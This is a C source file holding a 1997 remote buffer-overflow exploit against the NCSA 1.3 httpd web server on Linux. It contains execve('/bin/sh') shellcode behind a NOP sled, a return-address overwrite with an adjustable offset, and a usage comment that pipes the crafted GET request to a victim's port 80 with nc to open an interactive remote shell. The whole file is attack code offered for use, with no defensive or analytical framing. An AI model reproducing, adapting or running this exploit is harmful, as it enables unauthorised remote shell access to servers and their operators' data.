/*
 * NCSA 1.3 Linux/intel remote xploit by savage@apostols.org 1997-April-23
 *
 * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of ToXyn !!!
 *
 * usage:
 *	$ (hackttpd 0; cat) | nc victim 80
 *                  |
 *                  +--> usually from -1000 to 1000 (try steeps of 100)
 */

#include <stdio.h>

unsigned char shell[] = {
  '/',0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76,
  0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b,
  0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff,
  'b','i','n','/','s','h'
};

char username[256+8];

void main(int argc, char *argv[])
{
  int i,a;
  long val;

  if(argc>1)
    a=atoi(argv[1]);
  else
    a=0;

  strcpy(username,shell);

  for(i=strlen(shell);i<sizeof(username);i++)
    username[i]=0x90; /* NOP */

  val = 0xbfff537c + 4 + a;

  i=sizeof(username)-4;
  {
    username[i+0] = val & 0x000000ff;
    username[i+1] = (val & 0x0000ff00) >> 8;
    username[i+2] = (val & 0x00ff0000) >> 16;
    username[i+3] = (val & 0xff000000) >> 24;
  }

  username[ sizeof(username) ] = 0;

  printf("GET %s\n/bin/bash -i 2>&1;\n", username);
}
/*                    www.hack.co.za              [2000]*/